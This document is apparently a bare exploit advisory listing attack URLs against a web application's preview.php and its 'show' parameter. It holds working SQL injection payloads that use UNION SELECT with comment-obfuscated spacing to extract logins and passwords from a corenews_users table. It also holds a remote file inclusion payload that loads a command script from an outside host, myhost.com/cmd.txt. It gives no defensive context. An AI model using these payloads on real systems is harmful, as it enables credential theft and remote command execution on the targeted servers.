http://www.example.com/preview.php?userid=[SQL]
http://www.example.com/preview.php?icon_id=[SQL]
http://www.example.com/preview.php?userid=[SQL]&icon_id=[SQL]
http://www.example.com/preview.php?userid=-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*
http://www.example.com/preview.php?icon_id=-1/**/UNION/**/SELECT/**/0,password,login/**/FROM/**/corenews_users/*
http://www.example.com/?show=[FILE]
http://www.example.com/?show=http://myhost.com/cmd.txt?